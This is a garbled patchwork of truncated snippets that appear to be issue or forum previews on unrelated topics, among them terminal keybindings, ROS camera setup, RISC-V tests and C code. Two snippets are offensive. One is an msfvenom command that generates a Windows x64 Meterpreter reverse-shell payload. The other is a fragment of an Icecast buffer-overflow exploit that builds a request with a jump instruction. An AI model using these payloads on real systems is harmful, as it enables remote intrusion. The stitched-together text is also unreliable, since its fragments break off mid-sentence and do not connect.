I've just started the course and I'm really grateful to have found such a step by step resource.
In the the classic buffer overflow section, I'm not sure I understand why you put:
Hi, I'm transferred from tmux, i can change my Alaritty's keybindings for tmux like:
# Select window 1-9
- { key: Key1, mods: Command, chars: "\x02\x31" }
- { key: Key2, mods: Command, …
➜ ice python icecast.py 8000
Traceback (most recent call last):
File "ice/icecast.py", line 46, in
evul = "\xeb\x0c" + " / HTTP/1.1 " + buf + "\r\n" + "Accept: text/html\r\n"*…
github:https://github.com/merlinfeng Email:fengqiang1991@gmail.…
liteide supports "folding" parts of the code (i.e. functions, if's, switch statements,...) by clicking on the small triangle in the left column (near the line numbers). But very often all coll…
This line opens a local vulnerability that could be exploited by SEH Buffer Overflow technique.
I explo…
Hello, I'm working on a project with an Intel D435i camera, and am attempting to run the Kimera ROS wrapper alongside the D435i ROS wrapper on an NVIDIA Jetson AGX Xavier. The only two ROS packages th…
I may be missing something here but I think the Zbb tests are being generated incorrectly. For example, for `CLZ`:
TEST_RD_OP(clz, x31, x31, 0x00000000, 0x55555555, x1, 0, x2)
the command for generate payload for windows x64 arch is for example:
`msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows lhost= lport=4444 -f py -a x64`
please correct …
#include "stdafx.h"
int main(int argc, char* argv[])
int UnicodeStrLen;
UINT CodePage;
DWORD dwFlags;
LPCSTR lpMultiByteStr;
int cbMultiByte;